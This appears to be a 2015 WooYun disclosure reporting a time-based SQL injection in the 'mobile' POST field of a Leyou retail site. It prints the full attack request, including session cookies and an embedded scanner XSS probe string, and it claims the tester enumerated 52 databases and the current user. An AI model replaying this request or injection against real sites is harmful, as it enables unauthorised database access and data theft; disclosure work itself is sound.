当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151448

漏洞标题:乐友某站POST型SQL注入(延时注入)

相关厂商:乐友(中国)超市连锁有限公司

漏洞作者: 深度安全实验室

提交时间:2015-11-03 14:34

修复时间:2015-11-08 14:36

公开时间:2015-11-08 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

乐友某站POST型SQL注入(延时注入)

详细说明:

乐友某站POST型SQL注入(延时注入)

漏洞证明:

1、乐友某站POST型SQL注入,POST包如下:

POST /wish_list/searcherror HTTP/1.1
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://image.leyou.com.cn
Cookie: LYB2cSess=c7823737789a8556000c7fd2b9d40f66; PHPSESSID=11905b6fb0d52efd03a21d5f8f796064; LYProdListPage=http%3A%2F%2Fwww.leyou.com%2Fproduct%2Fage_i%2F0%3FLY_Category%3D24%26LY_Order%3Dsale_price; LY_CODE_SESS=9b6fe4d3a5495602; LY_PC=907610d0fb0f7af0c1da65256b8e9fb0; __ozlvd1400=1445967796; returnUrl=; ykss=7d8a2f5690d2ad9522bb6c17; __ptmid=a6f4f176-1c14-473a-a80f-a60838cb59f0; bdshare_firstime=1445958530877; BAIDUID=65323EB3872A7160250D09A35ACDE496:FG=1; OZ_1U_1400=vid=v62f95263f303b.0&ctime=1445958949&ltime=0; OZ_1Y_1400=erefer=http%3A//www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29&eurl=http%3A//image.leyou.com.cn/user/register.php&etime=1445958949&ctime=1445958949&ltime=0&compid=1400; single_bombBox=%u6FB3%u95E8%u7279%u522B%u884C%u653F%u533A-%u79BB%u5C9B; bombBox_addrid=820000; OZ_0J_1400=DIV*AD_YD_carttj*1445959205&DIV*AD_YD_carttj*1445959206; OZ_0a_1400=AD_YD_carttj*1445959205*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%23%23%232*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%23%23%231&AD_YD_carttj*1445959206*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%23%23%231*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%231
Host: image.leyou.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
button=GO&email=sample%40email.tst&email_name=%d4%da%b4%cb%ca%e4%c8%eb%c4%fa%b5%c4%c3%fb%d7%d6&mobile=*


2、mobile参数有问题:

1.png


3、52个库:

2.png


4、延时的,很慢,取下当前用户吧:

3.png

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-08 14:36

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

2015-11-19:谢谢


漏洞评价:

评论